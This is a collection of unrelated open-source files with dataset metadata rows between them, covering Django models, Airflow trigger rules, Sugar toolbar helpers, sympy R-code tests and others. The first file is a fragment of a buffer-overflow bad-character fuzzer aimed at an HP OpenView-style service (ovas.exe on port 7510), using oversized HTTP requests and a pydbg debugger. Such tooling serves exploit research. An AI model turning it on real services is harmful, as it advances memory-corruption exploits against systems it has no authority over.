if not service_is_running:
time.sleep(1)
continue
# If main loop reset the evil_str_sent flag to False, sent evil_str again
if not evil_str_sent:
timer = 0
char_counter += 1
if char_counter > len(allchars)-1:
print("[+] Bad chars: {}.".format(chars_to_str(badchars)))
print("[+] Good chars: {}.".format(chars_to_str(goodchars)))
print("[+] Done.")
# Hack to exit application from non-main thread
os._exit(0)
cur_char = allchars[char_counter]
# During crash [ESP + 4C] points to ("A" * 1025)th position
crash = "A" * 1025 + cur_char * 4 + "B" * 2551
evil_str = request_template.format(crash)
print("[+] Sending evil HTTP request...")
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("127.0.0.1", 7510))
sock.send(evil_str)
sock.close()
except:
print("[+] Error sending malicious buffer; service may be down.")
print("[+] Restarting the service and retrying...")
service_is_running = False
subprocess.Popen('taskkill /f /im ovas.exe').communicate()
finally:
evil_str_sent = True
else:
if timer > 10:
print("[+] 10 seconds passed without a crash. Bad char probably prevented the crash.")
print("[+] Marking last char as bad and killing the service...")
badchars.append(cur_char)
print("[+] Bad chars so far: {}.".format(chars_to_str(badchars)))
with open("badchars.txt",'w') as f:
f.write(chars_to_str(badchars))
service_is_running = False
subprocess.Popen('taskkill /f /im ovas.exe').communicate()
time.sleep(1)
timer += 1
return
def is_service_started():
# Check if service was successfully started
print("[+] Making sure the service was restarted...")
service_check_counter = 0
while not service_is_running:
if service_check_counter > 4: # Give it 5 attempts
return False
for process in wmi.WMI().Win32_Process():
if process.Name=='ovas.exe':
return process.ProcessId
service_check_counter += 1
time.sleep(1)
def is_service_responsive():
# Check if service responds to HTTP requests
print("[+] Making sure the service responds to HTTP requests...")
service_check_counter = 0
while not service_is_running:
# Give it 5 attempts
if service_check_counter > 4:
return False
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("127.0.0.1", 7510))
test_str = request_template.format("127.0.0.1")
sock.send(test_str)
# Give response 1 second to arrive
sock.settimeout(1.0)
resp = sock.recv(1024)
if resp:
return True
sock.close()
except Exception as e:
pass
service_check_counter += 1
def restart_service():
# Restart ovas.exe service and return its PID
global service_is_running
service_is_running = False
# Check that the service is running before stopping it
for process in wmi.WMI().Win32_Process():
if process.Name=='ovas.exe':
print("[+] Stopping the service...")
# Forcefully terminate the process
subprocess.Popen('taskkill /f /im ovas.exe').communicate()
print("[+] Starting the service...")
# Start the process with reliability
subprocess.Popen('ovstop -c ovas').communicate()
subprocess.Popen('ovstart -c ovas').communicate()
pid = is_service_started()
if pid:
print("[+] The service was restarted.")
else:
print("[-] Service was not found in process list. Restarting...")
return restart_service()
if is_service_responsive():
print("[+] Service responds to HTTP requests. Green ligth.")
service_is_running = True
return pid
else:
print("[-] Service does not respond to HTTP requests. Restarting...")
return restart_service()
def check_char(rawdata):
# Compare the buffer sent with the one in memory to see if it has been mangled in order to identify bad characters.
global badchars, goodchars
hexdata = dbg.hex_dump(rawdata)
print("[+] Buffer: {}".format(hexdata))
# Sent data must be equal to data in memory
if rawdata == (cur_char * 4):
goodchars.append(cur_char)
print("[+] Char {} is good.".format(chars_to_str(cur_char)))
print("[+] Good chars so far: {}.".format(chars_to_str(goodchars)))
with open("goodchars.txt",'w') as f:
f.write(chars_to_str(goodchars))
else:
badchars.append(cur_char)
print("[+] Char {} is bad.".format(chars_to_str(cur_char)))
print("[+] Bad chars so far: {}.".format(chars_to_str(badchars)))
with open("badchars.txt",'w') as f:
f.write(chars_to_str(badchars))
return
def _access_violation_handler(dbg):
# On access violation read data from a pointer on the stack to determine if the sent buffer was mangled in any way
print("[+] Access violation caught.")
# [ESP + 0x4C] points to our test buffer
esp_offset = 0x4C
buf_address = dbg.read(dbg.context.Esp + esp_offset, 0x4)
buf_address = dbg.flip_endian_dword(buf_address)
print("[+] [DEBUG] buf_address: {}".format(buf_address))
if buf_address:
# Read 4 bytes test buffer
buffer = dbg.read(buf_address, 0x4)
print("[+] buffer is " + buffer);
else:
# Now when the first request sent is the one for checking if the
# service responds, the buf_address sometimes returns 0. This is to
# handle that case.
buffer = ""
print("[+] Checking whether the char is good or bad...")
check_char(buffer)
dbg.detach()
return DBG_EXCEPTION_NOT_HANDLED
def debug_process(pid):
# Create a debugger instance and attach to minishare PID"""
dbg = pydbg()
dbg.set_callback(EXCEPTION_ACCESS_VIOLATION, _access_violation_handler)
while True:
try:
print("[+] Attaching debugger to pid: {}.".format(pid))
if dbg.attach(pid):
return dbg
else:
return False
except Exception as e:
print("[+] Error while attaching: {}.".format(e.message))
return False
if __name__ == '__main__':
# Create and start crasher thread
crasher_thread = threading.Thread(target=crash_service)
crasher_thread.setDaemon(0)
crasher_thread.start()
print("[+] thread started");
# Main loop
while True:
pid = restart_service()
print("[+] restart_service "+str(pid));
dbg = debug_process(pid)
print("[+] dbg started");
if dbg:
# Tell crasher thread to send malicious input to process
evil_str_sent = False
# Enter the debugging loop
dbg.run() | mit | 5,686,919,584,607,260,000 | 29.754386 | 116 | 0.674464 | false |
MarxDimitri/schmankerl | schmankerlapp/models.py | 1 | 1505 | from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Restaurant(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, related_name='restaurant')
name = models.CharField(max_length=500)
phone = models.CharField(max_length=500)
address = models.CharField(max_length=500)
logo = models.ImageField(upload_to='restaurant_logo/', blank=False)
def __str__(self):
return self.name
class Customer(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, related_name='customer')
avatar = models.CharField(max_length=500)
phone = models.CharField(max_length=500, blank=True)
address = models.CharField(max_length=500, blank=True)
def __str__(self):
return self.user.get_full_name()
class Driver(models.Model):
user = models.OneToOneField(User, on_delete=models.CASCADE, related_name='driver')
avatar = models.CharField(max_length=500)
phone = models.CharField(max_length=500, blank=True)
address = models.CharField(max_length=500, blank=True)
def __str__(self):
return self.user.get_full_name()
class Meal(models.Model):
restaurant = models.ForeignKey(Restaurant)
name = models.CharField(max_length=500)
short_description = models.CharField(max_length=500)
image = models.ImageField(upload_to='meal_images/', blank=False)
price = models.FloatField(default=0)
def __str__(self):
return self.name
| apache-2.0 | 687,804,165,970,565,200 | 35.707317 | 90 | 0.706312 | false |
Fokko/incubator-airflow | airflow/ti_deps/deps/trigger_rule_dep.py | 1 | 9884 | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from sqlalchemy import case, func
import airflow
from airflow.ti_deps.deps.base_ti_dep import BaseTIDep
from airflow.utils.db import provide_session
from airflow.utils.state import State
class TriggerRuleDep(BaseTIDep):
"""
Determines if a task's upstream tasks are in a state that allows a given task instance
to run.
"""
NAME = "Trigger Rule"
IGNOREABLE = True
IS_TASK_DEP = True
@provide_session
def _get_dep_statuses(self, ti, session, dep_context):
TI = airflow.models.TaskInstance
TR = airflow.utils.trigger_rule.TriggerRule
# Checking that all upstream dependencies have succeeded
if not ti.task.upstream_list:
yield self._passing_status(
reason="The task instance did not have any upstream tasks.")
return
if ti.task.trigger_rule == TR.DUMMY:
yield self._passing_status(reason="The task had a dummy trigger rule set.")
return
# TODO(unknown): this query becomes quite expensive with dags that have many
# tasks. It should be refactored to let the task report to the dag run and get the
# aggregates from there.
qry = (
session
.query(
func.coalesce(func.sum(
case([(TI.state == State.SUCCESS, 1)], else_=0)), 0),
func.coalesce(func.sum(
case([(TI.state == State.SKIPPED, 1)], else_=0)), 0),
func.coalesce(func.sum(
case([(TI.state == State.FAILED, 1)], else_=0)), 0),
func.coalesce(func.sum(
case([(TI.state == State.UPSTREAM_FAILED, 1)], else_=0)), 0),
func.count(TI.task_id),
)
.filter(
TI.dag_id == ti.dag_id,
TI.task_id.in_(ti.task.upstream_task_ids),
TI.execution_date == ti.execution_date,
TI.state.in_([
State.SUCCESS, State.FAILED,
State.UPSTREAM_FAILED, State.SKIPPED]),
)
)
successes, skipped, failed, upstream_failed, done = qry.first()
yield from self._evaluate_trigger_rule(
ti=ti,
successes=successes,
skipped=skipped,
failed=failed,
upstream_failed=upstream_failed,
done=done,
flag_upstream_failed=dep_context.flag_upstream_failed,
session=session)
@provide_session
def _evaluate_trigger_rule(
self,
ti,
successes,
skipped,
failed,
upstream_failed,
done,
flag_upstream_failed,
session):
"""
Yields a dependency status that indicate whether the given task instance's trigger
rule was met.
:param ti: the task instance to evaluate the trigger rule of
:type ti: airflow.models.TaskInstance
:param successes: Number of successful upstream tasks
:type successes: int
:param skipped: Number of skipped upstream tasks
:type skipped: int
:param failed: Number of failed upstream tasks
:type failed: int
:param upstream_failed: Number of upstream_failed upstream tasks
:type upstream_failed: int
:param done: Number of completed upstream tasks
:type done: int
:param flag_upstream_failed: This is a hack to generate
the upstream_failed state creation while checking to see
whether the task instance is runnable. It was the shortest
path to add the feature
:type flag_upstream_failed: bool
:param session: database session
:type session: sqlalchemy.orm.session.Session
"""
TR = airflow.utils.trigger_rule.TriggerRule
task = ti.task
upstream = len(task.upstream_task_ids)
tr = task.trigger_rule
upstream_done = done >= upstream
upstream_tasks_state = {
"total": upstream, "successes": successes, "skipped": skipped,
"failed": failed, "upstream_failed": upstream_failed, "done": done
}
# TODO(aoen): Ideally each individual trigger rules would be its own class, but
# this isn't very feasible at the moment since the database queries need to be
# bundled together for efficiency.
# handling instant state assignment based on trigger rules
if flag_upstream_failed:
if tr == TR.ALL_SUCCESS:
if upstream_failed or failed:
ti.set_state(State.UPSTREAM_FAILED, session)
elif skipped:
ti.set_state(State.SKIPPED, session)
elif tr == TR.ALL_FAILED:
if successes or skipped:
ti.set_state(State.SKIPPED, session)
elif tr == TR.ONE_SUCCESS:
if upstream_done and not successes:
ti.set_state(State.SKIPPED, session)
elif tr == TR.ONE_FAILED:
if upstream_done and not (failed or upstream_failed):
ti.set_state(State.SKIPPED, session)
elif tr == TR.NONE_FAILED:
if upstream_failed or failed:
ti.set_state(State.UPSTREAM_FAILED, session)
elif skipped == upstream:
ti.set_state(State.SKIPPED, session)
elif tr == TR.NONE_SKIPPED:
if skipped:
ti.set_state(State.SKIPPED, session)
if tr == TR.ONE_SUCCESS:
if successes <= 0:
yield self._failing_status(
reason="Task's trigger rule '{0}' requires one upstream "
"task success, but none were found. "
"upstream_tasks_state={1}, upstream_task_ids={2}"
.format(tr, upstream_tasks_state, task.upstream_task_ids))
elif tr == TR.ONE_FAILED:
if not failed and not upstream_failed:
yield self._failing_status(
reason="Task's trigger rule '{0}' requires one upstream "
"task failure, but none were found. "
"upstream_tasks_state={1}, upstream_task_ids={2}"
.format(tr, upstream_tasks_state, task.upstream_task_ids))
elif tr == TR.ALL_SUCCESS:
num_failures = upstream - successes
if num_failures > 0:
yield self._failing_status(
reason="Task's trigger rule '{0}' requires all upstream "
"tasks to have succeeded, but found {1} non-success(es). "
"upstream_tasks_state={2}, upstream_task_ids={3}"
.format(tr, num_failures, upstream_tasks_state,
task.upstream_task_ids))
elif tr == TR.ALL_FAILED:
num_successes = upstream - failed - upstream_failed
if num_successes > 0:
yield self._failing_status(
reason="Task's trigger rule '{0}' requires all upstream "
"tasks to have failed, but found {1} non-failure(s). "
"upstream_tasks_state={2}, upstream_task_ids={3}"
.format(tr, num_successes, upstream_tasks_state,
task.upstream_task_ids))
elif tr == TR.ALL_DONE:
if not upstream_done:
yield self._failing_status(
reason="Task's trigger rule '{0}' requires all upstream "
"tasks to have completed, but found {1} task(s) that "
"weren't done. upstream_tasks_state={2}, "
"upstream_task_ids={3}"
.format(tr, upstream_done, upstream_tasks_state,
task.upstream_task_ids))
elif tr == TR.NONE_FAILED:
num_failures = upstream - successes - skipped
if num_failures > 0:
yield self._failing_status(
reason="Task's trigger rule '{0}' requires all upstream "
"tasks to have succeeded or been skipped, but found {1} non-success(es). "
"upstream_tasks_state={2}, upstream_task_ids={3}"
.format(tr, num_failures, upstream_tasks_state,
task.upstream_task_ids))
elif tr == TR.NONE_SKIPPED:
if not upstream_done or (skipped > 0):
yield self._failing_status(
reason="Task's trigger rule '{0}' requires all upstream "
"tasks to not have been skipped, but found {1} task(s) skipped. "
"upstream_tasks_state={2}, upstream_task_ids={3}"
.format(tr, skipped, upstream_tasks_state,
task.upstream_task_ids))
else:
yield self._failing_status(
reason="No strategy to evaluate trigger rule '{0}'.".format(tr))
| apache-2.0 | -311,230,294,439,406,660 | 43.32287 | 94 | 0.563234 | false |
nexdatas/configserver | test/NXSConfigServer_test.py | 1 | 4015 | #!/usr/bin/env python
# This file is part of nexdatas - Tango Server for NeXus data writer
#
# Copyright (C) 2012-2017 DESY, Jan Kotanski <[email protected]>
#
# nexdatas is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# nexdatas is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with nexdatas. If not, see <http://www.gnu.org/licenses/>.
# \package test nexdatas
# \file NXSConfigServer_test.py
# unittests for field Tags running Tango Server
#
import unittest
import sys
import time
import PyTango
# import XMLConTest as XMLConfigurator_test
# from nxsconfigserver import XMLConfigurator
import nxsconfigserver
# test fixture
try:
from . import ServerSetUp
except Exception:
import ServerSetUp
try:
from . import XMLConfigurator_test
except Exception:
import XMLConfigurator_test
if sys.version_info > (3,):
long = int
class NXSConfigServerTest(XMLConfigurator_test.XMLConfiguratorTest):
# constructor
# \param methodName name of the test method
def __init__(self, methodName):
XMLConfigurator_test.XMLConfiguratorTest.__init__(self, methodName)
self._sv = ServerSetUp.ServerSetUp()
# test starter
# \brief Common set up of Tango Server
def setUp(self):
self._sv.setUp()
print("SEED = %s" % self.seed)
# test closer
# \brief Common tear down oif Tango Server
def tearDown(self):
XMLConfigurator_test.XMLConfiguratorTest.tearDown(self)
self._sv.tearDown()
# opens config server
# \param args connection arguments
# \returns NXSConfigServer instance
def openConfig(self, args):
found = False
cnt = 0
while not found and cnt < 1000:
try:
sys.stdout.write("\b.")
xmlc = PyTango.DeviceProxy(
self._sv.new_device_info_writer.name)
time.sleep(0.01)
if xmlc.state() == PyTango.DevState.ON:
found = True
found = True
except Exception as e:
print("%s %s" % (self._sv.new_device_info_writer.name, e))
found = False
except Exception:
found = False
cnt += 1
if not found:
raise Exception(
"Cannot connect to %s"
% self._sv.new_device_info_writer.name)
if xmlc.state() == PyTango.DevState.ON:
xmlc.JSONSettings = args
xmlc.Open()
version = xmlc.version
vv = version.split('.')
self.revision = long(vv[-1])
self.version = ".".join(vv[0:3])
self.label = ".".join(vv[3:-1])
self.assertEqual(self.version, nxsconfigserver.__version__)
self.assertEqual(self.label, '.'.join(xmlc.Version.split('.')[3:-1]))
self.assertEqual(xmlc.state(), PyTango.DevState.OPEN)
return xmlc
# closes opens config server
# \param xmlc XMLConfigurator instance
def closeConfig(self, xmlc):
self.assertEqual(xmlc.state(), PyTango.DevState.OPEN)
xmlc.Close()
self.assertEqual(xmlc.state(), PyTango.DevState.ON)
# sets xmlconfiguration
# \param xmlc configuration instance
# \param xml xml configuration string
def setXML(self, xmlc, xml):
xmlc.XMLString = xml
# gets xmlconfiguration
# \param xmlc configuration instance
# \returns xml configuration string
def getXML(self, xmlc):
return xmlc.XMLString
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | 5,636,351,133,139,023,000 | 28.740741 | 77 | 0.631382 | false |
walterbender/story | toolbar_utils.py | 1 | 5567 | # -*- coding: utf-8 -*-
# Copyright (c) 2011, Walter Bender
# Port To GTK3:
# Ignacio Rodriguez <[email protected]>
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# You should have received a copy of the GNU General Public License
# along with this library; if not, write to the Free Software
# Foundation, 51 Franklin Street, Suite 500 Boston, MA 02110-1335 USA
from gi.repository import Gtk
from sugar3.graphics.radiotoolbutton import RadioToolButton
from sugar3.graphics.toolbutton import ToolButton
from sugar3.graphics.combobox import ComboBox
def combo_factory(combo_array, toolbar, callback, cb_arg=None,
tooltip=None, default=None):
'''Factory for making a toolbar combo box'''
combo = ComboBox()
if tooltip is not None and hasattr(combo, 'set_tooltip_text'):
combo.set_tooltip_text(tooltip)
if cb_arg is not None:
combo.connect('changed', callback, cb_arg)
else:
combo.connect('changed', callback)
for i, selection in enumerate(combo_array):
combo.append_item(i, selection, None)
combo.show()
toolitem = Gtk.ToolItem()
toolitem.add(combo)
if hasattr(toolbar, 'insert'): # the main toolbar
toolbar.insert(toolitem, -1)
else: # or a secondary toolbar
toolbar.props.page.insert(toolitem, -1)
toolitem.show()
if default is not None:
combo.set_active(combo_array.index(default))
return combo
def entry_factory(default_string, toolbar, tooltip=None, max=3):
''' Factory for adding a text box to a toolbar '''
entry = Gtk.Entry()
entry.set_text(default_string)
if tooltip is not None and hasattr(entry, 'set_tooltip_text'):
entry.set_tooltip_text(tooltip)
entry.set_width_chars(max)
entry.show()
toolitem = Gtk.ToolItem()
toolitem.add(entry)
if hasattr(toolbar, 'insert'): # the main toolbar
toolbar.insert(toolitem, -1)
else: # or a secondary toolbar
toolbar.props.page.insert(toolitem, -1)
toolitem.show()
return entry
def button_factory(icon_name, toolbar, callback, cb_arg=None, tooltip=None,
accelerator=None):
'''Factory for making tooplbar buttons'''
button = ToolButton(icon_name)
if tooltip is not None:
button.set_tooltip(tooltip)
button.props.sensitive = True
if accelerator is not None:
button.props.accelerator = accelerator
if cb_arg is not None:
button.connect('clicked', callback, cb_arg)
else:
button.connect('clicked', callback)
if hasattr(toolbar, 'insert'): # the main toolbar
toolbar.insert(button, -1)
else: # or a secondary toolbar
toolbar.props.page.insert(button, -1)
button.show()
return button
def radio_factory(name, toolbar, callback, cb_arg=None, tooltip=None,
group=None):
''' Add a radio button to a toolbar '''
button = RadioToolButton(group=group)
button.set_icon_name(name)
if callback is not None:
if cb_arg is None:
button.connect('clicked', callback)
else:
button.connect('clicked', callback, cb_arg)
if hasattr(toolbar, 'insert'): # Add button to the main toolbar...
toolbar.insert(button, -1)
else: # ...or a secondary toolbar.
toolbar.props.page.insert(button, -1)
button.show()
if tooltip is not None:
button.set_tooltip(tooltip)
return button
def label_factory(toolbar, label_text, width=None):
''' Factory for adding a label to a toolbar '''
label = Gtk.Label(label_text)
label.set_line_wrap(True)
if width is not None:
label.set_size_request(width, -1) # doesn't work on XOs
label.show()
toolitem = Gtk.ToolItem()
toolitem.add(label)
if hasattr(toolbar, 'insert'): # the main toolbar
toolbar.insert(toolitem, -1)
else: # or a secondary toolbar
toolbar.props.page.insert(toolitem, -1)
toolitem.show()
return label
def separator_factory(toolbar, expand=False, visible=True):
''' add a separator to a toolbar '''
separator = Gtk.SeparatorToolItem()
separator.props.draw = visible
separator.set_expand(expand)
if hasattr(toolbar, 'insert'): # the main toolbar
toolbar.insert(separator, -1)
else: # or a secondary toolbar
toolbar.props.page.insert(separator, -1)
separator.show()
def image_factory(image, toolbar, tooltip=None):
''' Add an image to the toolbar '''
img = Gtk.Image()
img.set_from_pixbuf(image)
img_tool = Gtk.ToolItem()
img_tool.add(img)
if tooltip is not None:
img.set_tooltip_text(tooltip)
if hasattr(toolbar, 'insert'): # the main toolbar
toolbar.insert(img_tool, -1)
else: # or a secondary toolbar
toolbar.props.page.insert(img_tool, -1)
img_tool.show()
return img
def spin_factory(default, min, max, callback, toolbar):
spin_adj = Gtk.Adjustment(default, min, max, 1, 32, 0)
spin = Gtk.SpinButton(spin_adj, 0, 0)
spin.connect('value-changed', callback)
spin.set_numeric(True)
spin.show()
toolitem = Gtk.ToolItem()
toolitem.add(spin)
if hasattr(toolbar, 'insert'): # the main toolbar
toolbar.insert(toolitem, -1)
else:
toolbar.props.page.insert(toolitem, -1)
toolitem.show()
return spin
| gpl-3.0 | -1,535,071,521,111,068,200 | 32.945122 | 75 | 0.659062 | false |
tbjoern/adventofcode | Thirteen/refined.py | 1 | 2330 | import Queue
import time
import sys
if len(sys.argv) > 1:
try:
seed = int(sys.argv[1])
except ValueError, x:
seed = 1600
width, height = 40,41
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def isWall(x,y):
num = x*x + 3*x + 2*x*y + y + y*y
num += seed
ones = 0
while num:
if num & 1:
ones += 1
num = num >> 1
return ones % 2 == 1
def clear():
for i in range(height):
sys.stdout.write("\033[F") #back to previous line
sys.stdout.write("\033[K") #clear line
def render(lab):
for j in range(height):
line = ""
for i in range(width):
if lab[i][j]:
line += bcolors.OKBLUE + chr(176) + bcolors.ENDC
elif (i,j) == (1,1):
line += bcolors.FAIL + "S" + bcolors.ENDC
elif (i,j) == (31,39):
line += bcolors.OKGREEN + "E" + bcolors.ENDC
elif (i,j) in shortestPath:
line += bcolors.WARNING + "*" + bcolors.ENDC
elif pre[i][j]:
line += "."
else:
line += " "
print line
def renderStep(skip,amount):
if skip % amount == 0:
clear()
render(lab)
time.sleep(.15)
skip = 0
return skip + 1
shortestPath = []
lab = [[isWall(x,y) for y in range(height)] for x in range(width)]
visited = [[False for y in range(height)] for x in range(width)]
pre = [[None for y in range(height)] for x in range(width)]
q = Queue.Queue()
q.put((1,1))
render(lab)
skip = 0
while not q.empty():
field = q.get()
for i in range(-1,2):
for j in range(-1,2):
if i != j and i + j != 0:
adjField = (i+field[0], j + field[1])
if adjField[0] < 0 or adjField[0] >= width or adjField[1] < 0 or adjField[1] >= height:
continue
if not pre[adjField[0]][adjField[1]] and not lab[adjField[0]][adjField[1]]:
pre[adjField[0]][adjField[1]] = field
q.put(adjField)
skip = renderStep(skip,1)
if not pre[1][1] or not pre[31][39]:
print "There is no path here"
sys.exit()
clear()
render(lab)
shortestPath = [(31,39)]
u = (31,39)
while u != (1,1):
shortestPath.append(u)
u = pre[u[0]][u[1]]
skip = renderStep(skip,1)
clear()
render(lab)
print "Shortest path length: " + str(len(shortestPath)) | mit | -4,447,621,782,373,359,000 | 19.592593 | 91 | 0.562661 | false |
yeleman/health_ident | health_ident/management/commands/export_j2me.py | 1 | 2794 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# vim: ai ts=4 sts=4 et sw=4 nu
from __future__ import (unicode_literals, absolute_import,
division, print_function)
import os
import zipfile
from django.conf import settings
from optparse import make_option
from django.core.management.base import BaseCommand
from django.template import loader, Context
from health_ident.models import Entity, HealthEntity
class Command(BaseCommand):
option_list = BaseCommand.option_list + (
make_option('-f',
help='CSV file to export health_entity_properties to',
action='store',
dest='input_file'),
make_option('-s',
help='Comma-separated list of Region Slugs to include',
action='store',
dest='only_regions'),
)
def handle(self, *args, **options):
export_dir = os.path.join(settings.BASE_DIR, 'j2me')
if not os.path.exists(export_dir):
os.mkdir(export_dir)
if options.get('only_regions'):
only_regions = options.get('only_regions').split(',')
regions = HealthEntity.objects.filter(slug__in=only_regions)
else:
mali = Entity.objects.get(slug='mali')
regions = HealthEntity.objects.filter(parent=mali)
print("Exporting Health Entities...")
for region in regions:
for district in region.get_children():
district_file_content = loader.get_template("j2me/EntityHashTableDistrict.java") \
.render(Context({'district': district}))
with open(os.path.join(export_dir, "EntityHashTable{}.java".format(district.slug)), 'w') as f:
f.write(district_file_content.encode('utf-8'))
print(district.name)
with open(os.path.join(export_dir, "Utils.java"), 'w') as f:
f.write(loader.get_template("j2me/Utils.java").render(Context({})).encode('utf-8'))
with open(os.path.join(export_dir, "EntityHashTable.java"), 'w') as f:
f.write(loader.get_template("j2me/EntityHashTable.java").render(Context({})).encode('utf-8'))
region_file_content = loader.get_template("j2me/StaticCodes.java") \
.render(Context({'regions': regions}))
with open(os.path.join(export_dir, "StaticCodes.java"), 'w') as f:
f.write(region_file_content.encode('utf-8'))
zf = zipfile.ZipFile(options.get('input_file'), mode='w')
for asset in os.listdir(os.path.join(export_dir)):
zf.write(os.path.join(export_dir, asset),
os.path.join('snisi', 'entities', asset))
zf.close() | unlicense | 8,823,605,234,748,818,000 | 35.298701 | 110 | 0.582319 | false |
sumihai-tekindo/account_sicepat | add_sub_menu/models/check_id.py | 1 | 1245 | from datetime import datetime
from openerp.osv import fields,osv
from openerp.tools.translate import _
class purchase_requisition_line(osv.osv):
_inherit = "purchase.requisition.line"
def stock_out(self, cr, uid, ids,stock_out):
if self.stock_out:
return {
'view_type': 'form',
'flags': {'action_buttons': True},
'view_mode': 'kanban,form',
'res_model': 'stock.picking.type',
'target': 'current',
'res_id': 'stock.picking',
'type': 'ir.actions.act_window'
}
# def onchange_product_id(self, cr, uid, ids, product_id, product_uom_id, parent_analytic_account, analytic_account, parent_date, date, context=None):
# oc_res = super(purchase_requisition_line,self).onchange_product_id(cr, uid, ids, product_id, product_uom_id, parent_analytic_account, analytic_account, parent_date, date, context=context)
# if(product_id):
# product = self.pool.get('product.product').browse(cr,uid,product_id,context=context)
# if (product.default_code=='Asset'):
# warning={
# 'title':'WARNING',
# 'message':"There are %s %s for %s in stock"%(product.qty_available,product.uom_id.name,product.name)
# }
# oc_res.update({'warning':warning})
# return oc_res
| gpl-3.0 | -3,897,940,405,699,393,500 | 35.787879 | 191 | 0.659438 | false |
nkoep/blaplay | blaplay/formats/wav.py | 1 | 1831 | # blaplay, Copyright (C) 2012 Niklas Koep
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
import wave
from _blatrack import BlaTrack
from blaplay.formats import TagParseError
from _identifiers import *
class Wav(BlaTrack):
__slots__ = ("extensions")
extensions = ["wav"]
def _read_tags(self):
# The wave module uses fixed sampling rates. Custom sampling rates are
# therefore mapped to commonly used ones. Additionally, it doesn't
# detect compression modes like ADPCM. Therefore we just specify
# `lossless' as encoding type; it's not like these are common
# use-cases anyway.
try:
audio = wave.open(self.uri, "r")
except wave.Error:
raise TagParseError
self[SAMPLING_RATE] = audio.getframerate()
self[CHANNELS] = audio.getnchannels()
self[CHANNEL_MODE] = "Mono" if self[CHANNELS] == 1 else "Stereo"
self[BITRATE] = (audio.getframerate() * 8 * audio.getsampwidth() *
self[CHANNELS])
self[LENGTH] = audio.getnframes() / audio.getframerate()
self[FORMAT] = "WAVE"
self[ENCODING] = "lossless"
audio.close()
| gpl-2.0 | -6,617,483,503,426,571,000 | 35.62 | 78 | 0.677226 | false |
kaushik94/sympy | sympy/printing/tests/test_rcode.py | 7 | 14176 | from sympy.core import (S, pi, oo, Symbol, symbols, Rational, Integer,
GoldenRatio, EulerGamma, Catalan, Lambda, Dummy, Eq)
from sympy.functions import (Piecewise, sin, cos, Abs, exp, ceiling, sqrt,
gamma, sign, Max, Min, factorial, beta)
from sympy.sets import Range
from sympy.logic import ITE
from sympy.codegen import For, aug_assign, Assignment
from sympy.utilities.pytest import raises
from sympy.printing.rcode import RCodePrinter
from sympy.utilities.lambdify import implemented_function
from sympy.tensor import IndexedBase, Idx
from sympy.matrices import Matrix, MatrixSymbol
from sympy import rcode
from difflib import Differ
from pprint import pprint
x, y, z = symbols('x,y,z')
def test_printmethod():
class fabs(Abs):
def _rcode(self, printer):
return "abs(%s)" % printer._print(self.args[0])
assert rcode(fabs(x)) == "abs(x)"
def test_rcode_sqrt():
assert rcode(sqrt(x)) == "sqrt(x)"
assert rcode(x**0.5) == "sqrt(x)"
assert rcode(sqrt(x)) == "sqrt(x)"
def test_rcode_Pow():
assert rcode(x**3) == "x^3"
assert rcode(x**(y**3)) == "x^(y^3)"
g = implemented_function('g', Lambda(x, 2*x))
assert rcode(1/(g(x)*3.5)**(x - y**x)/(x**2 + y)) == \
"(3.5*2*x)^(-x + y^x)/(x^2 + y)"
assert rcode(x**-1.0) == '1.0/x'
assert rcode(x**Rational(2, 3)) == 'x^(2.0/3.0)'
_cond_cfunc = [(lambda base, exp: exp.is_integer, "dpowi"),
(lambda base, exp: not exp.is_integer, "pow")]
assert rcode(x**3, user_functions={'Pow': _cond_cfunc}) == 'dpowi(x, 3)'
assert rcode(x**3.2, user_functions={'Pow': _cond_cfunc}) == 'pow(x, 3.2)'
def test_rcode_Max():
# Test for gh-11926
assert rcode(Max(x,x*x),user_functions={"Max":"my_max", "Pow":"my_pow"}) == 'my_max(x, my_pow(x, 2))'
def test_rcode_constants_mathh():
p=rcode(exp(1))
assert rcode(exp(1)) == "exp(1)"
assert rcode(pi) == "pi"
assert rcode(oo) == "Inf"
assert rcode(-oo) == "-Inf"
def test_rcode_constants_other():
assert rcode(2*GoldenRatio) == "GoldenRatio = 1.61803398874989;\n2*GoldenRatio"
assert rcode(
2*Catalan) == "Catalan = 0.915965594177219;\n2*Catalan"
assert rcode(2*EulerGamma) == "EulerGamma = 0.577215664901533;\n2*EulerGamma"
def test_rcode_Rational():
assert rcode(Rational(3, 7)) == "3.0/7.0"
